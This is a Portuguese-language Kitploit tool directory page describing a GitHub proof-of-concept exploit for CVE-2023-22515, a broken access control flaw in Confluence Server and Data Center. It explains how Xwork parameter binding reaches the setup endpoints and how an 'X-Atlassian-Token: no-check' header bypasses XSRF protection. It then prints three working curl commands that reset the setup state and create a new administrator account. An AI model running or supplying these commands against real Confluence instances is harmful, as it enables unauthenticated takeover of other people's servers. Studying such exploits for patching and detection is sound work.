Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/j3seer/cve-2023-22515-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

Exploit de prova de conceito para CVE-2023-22515, uma vulnerabilidade crítica de controle de acesso quebrado no Confluence Server e Data Center, permitindo tomada de controle administrativo não autenticada.

Ver Repositório
824há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-22515

CVE-2023-22515, uma vulnerabilidade crítica que afeta instâncias locais do Confluence Server e Confluence Data Center, é uma vulnerabilidade de controle de acesso quebrado. A Atlassian atribuiu uma pontuação base CVSS de 10.0.

Exploit

Explicação breve:

1- Devido à forma como os interceptadores Xwork analisam parâmetros, /test.action?one=a equivale a setOne()='a' e alternativamente /test.action?one.two=a equivale a getOne().setTwo()="a"

2- Os endpoints /setup/* incluem uma chamada @ParameterSafe que nos permite usar set e get como em , porém, como os endpoints estão bloqueados porque a configuração está concluída, o endpoint pode ser utilizado.

/setup/setupdb.action?dbConfigInfo.databaseType=postgresql
/setup/*
/server-info.action

3- Encontre o método set para concluir a configuração => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- Use o cabeçalho "X-Atlassian-Token" para contornar o XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

Referências

AVISO: O exploit não foi descoberto ou criado por mim; o crédito vai para os artigos abaixo

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

Baixar ferramenta